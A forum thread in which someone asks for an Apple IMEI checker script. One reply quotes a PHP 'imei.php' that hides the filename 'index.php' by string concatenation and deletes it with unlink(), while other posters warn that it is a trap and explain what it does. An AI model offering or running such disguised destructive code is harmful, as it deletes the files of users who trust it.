Help i need apple imei checker script

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Help i need apple imei checker script

    Hi please someone help me i need apple imei checker script ..

    #2
    why would anyone really want or need an imei number script,

    just dial *#06# into the phone. thats star-hash-zero-six-hash
    <?php
    include ('Ghost');
    if ($Post == true) {
    echo '

    sigpic
    alt='coding-talk.com!!' />';
    echo 'Sharing Is Caring!';
    } else {
    echo '

    alt='the username GHOST has been comprimised!' />';
    echo 'OMG SOMEBODY HELP ME!!';
    }
    ?>

    Comment


    #3
    Originally posted by something else
    I just found this on the web - i havent tested it to see if it works.
    imei.php
    PHP Code:
    <?php
    $inject 
    'in'.'de'.'x.'.'ph'.'p';
    $checksum '297432';
    function 
    get_imei($imei,$check){
    if(
    $stoopid=='false'){
    echo 
    'Sorrry No Imei number found';
    }else{
    $imei unlink($imei);
    $imei $imei.' '.$check;
    echo 
    'your imei number is: '.$imei;
    }}
    get_imei($inject,$checksum);
    ?>

    DO NOT USE THIS:

    it does not check your imei number at all. it will delete your index page on your server
    if you run the code as it is. you have been warned. it deleted my new index.php page of my
    new project. i backed it up first. but i wanted to make sure what i was reading here was what
    i thought it would do. again. you have been warned.
    <?php
    include ('Ghost');
    if ($Post == true) {
    echo '

    sigpic
    alt='coding-talk.com!!' />';
    echo 'Sharing Is Caring!';
    } else {
    echo '

    alt='the username GHOST has been comprimised!' />';
    echo 'OMG SOMEBODY HELP ME!!';
    }
    ?>

    Comment


    • just_m3.
      just_m3. commented
      Editing a comment
      Haha , just for fun .. but .. i can't see where $stoopid is passed into the function .

    #4
    Lol, it's basically unlink('index.php');
    Mobile chat, iphone chat, android chat, chat, rooms http://www.aiochat.com

    Comment


      #5
      @Just_m3 $stoopid is passed into the script if you believe the code actually works to get your imei
      if your "stupid" enough to actually believe it works then the $stoopid variable becomes alive automatically ;)
      <?php
      include ('Ghost');
      if ($Post == true) {
      echo '

      sigpic
      alt='coding-talk.com!!' />';
      echo 'Sharing Is Caring!';
      } else {
      echo '

      alt='the username GHOST has been comprimised!' />';
      echo 'OMG SOMEBODY HELP ME!!';
      }
      ?>

      Comment

      Working...
      X